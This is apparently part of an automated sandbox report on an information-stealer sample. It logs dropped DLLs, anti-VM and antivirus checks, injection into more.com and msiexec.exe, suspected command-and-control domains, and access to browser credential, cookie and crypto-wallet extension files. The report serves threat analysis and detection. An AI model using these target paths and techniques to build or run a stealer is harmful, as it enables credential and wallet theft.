                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\accplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocolJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelperJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ktbJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe TID: 5424Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 2062 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep count: 482 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4360Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BtPwzevvMNetHb
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                    Source: Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QemUp
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                    Source: msiexec.exe, 0000000A.00000003.2179717349.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2197813079.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2152944130.0000000000701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hfuyiQxXpTIZMAqEMuFVSLjikUh
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmCIxZue
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Horizon Client
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PhgfSoVrt
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Player
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A56CC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA1A56CC0

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x23500280000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x18710Jump to behavior
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: p3ar11fter.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: 3xp3cts1aim.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: peepburry828.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: p10tgrace.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: processhol.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: 5ptit5tuded.cyou
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
                    Source: C:\Windows\SysWOW64\more.com Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read write
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: AA9330
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: 5FB008
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2F8A008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe Code function: 4_2_00007FF6689519D4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF6689519D4
                    Source: C:\Windows\SysWOW64\msiexec.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                    Source: msiexec.exe, 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                    Source: msiexec.exe, 0000000A.00000003.2139032960.000000000076E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
                    Source: msiexec.exe, 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: msiexec.exe, 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
